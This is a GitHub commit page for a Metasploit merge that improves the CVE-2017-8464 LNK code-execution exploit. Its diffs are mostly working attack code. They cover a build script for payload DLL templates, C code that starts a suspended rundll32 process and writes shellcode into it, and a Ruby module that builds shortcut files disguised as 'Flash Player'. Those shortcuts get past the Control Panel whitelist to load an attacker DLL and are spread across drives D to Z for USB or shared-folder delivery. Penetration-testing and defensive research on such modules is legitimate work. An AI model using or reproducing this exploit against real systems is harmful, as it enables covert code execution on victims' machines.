Permalink
Browse files

Merge branch 'pr9032' into upstream-master

Land #9032, Improve CVE-2017-8464 LNK exploit

Land #9032
  • Loading branch information...
Wei Chen
Wei Chen committed Oct 10, 2017
2 parents 88f5335 + 482ce00 commit a4bc3ea3c2c44921849df9ec01e831fead10fc75
@@ -6,11 +6,10 @@ CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
rm -f temp.dll *.o
View
@@ -22,13 +22,13 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
case DLL_THREAD_DETACH:
break;
}
@@ -69,7 +69,7 @@ void ExecutePayload(void)
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
// Create a suspended process, write shellcode into stack, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
@@ -17,18 +17,23 @@ def initialize(info = {})
info,
'Name' => 'LNK Code Execution Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
that contain a dynamic icon, loaded from a malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
similar except an additional SpecialFolderDataBlock is included. The folder ID set
in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
DLL file.
If no PATH is specified, the module will use drive letters D through Z so the files
may be placed in the root path of a drive such as a shared VM folder or USB drive.
},
'Author' =>
[
'Uncredited', # vulnerability discovery
'Yorick Koster' # msf module
'Uncredited', # vulnerability discovery
'Yorick Koster', # msf module
'Spencer McIntyre' # msf module
],
'License' => MSF_LICENSE,
'References' =>
@@ -56,28 +61,30 @@ def initialize(info = {})
[ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ]
],
'DefaultTarget' => 0, # Default target is Automatic
'DisclosureDate' => 'Jun 13 2017'
'DefaultTarget' => 0, # Default target is Automatic
'DisclosureDate' => 'Jun 13 2017'
)
)
register_options(
[
OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
OptString.new('PATH', [false, 'An explicit path to where the files will be hosted'])
]
)
register_advanced_options(
[
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
]
)
end
def exploit
path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
datastore['EXE::Path'] = path
datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
@@ -87,14 +94,14 @@ def exploit
dll_path = store_file(dll, dll_name)
print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
if datastore['DRIVE']
lnk = generate_link("#{datastore['DRIVE'].split(':')[0]}:\\#{dll_name}")
if datastore['PATH']
lnk = generate_link("#{datastore['PATH'].chomp("\\")}\\#{dll_name}")
lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
lnk_path = store_file(lnk, lnk_filename)
print_status("#{lnk_path} created, copy to the target USB drive")
print_status("#{lnk_path} created, copy to the target paths")
else
# HACK: the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead
# HACK: Create LNK files to different drives instead
# Copying all the LNK files will likely trigger this vulnerability
('D'..'Z').each do |i|
fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
@@ -108,9 +115,10 @@ def exploit
end
def generate_link(path)
vprint_status("Generating LNK file to load: #{path}")
path << "\x00"
display_name = "Flash Player\x00" # LNK Display Name
comment = "Manage Flash Player Settings\x00"
display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
comment = datastore['LnkComment'].dup << "\x00"
# Control Panel Applet ItemID with our DLL
cpl_applet = [

0 comments on commit a4bc3ea

Please sign in to comment.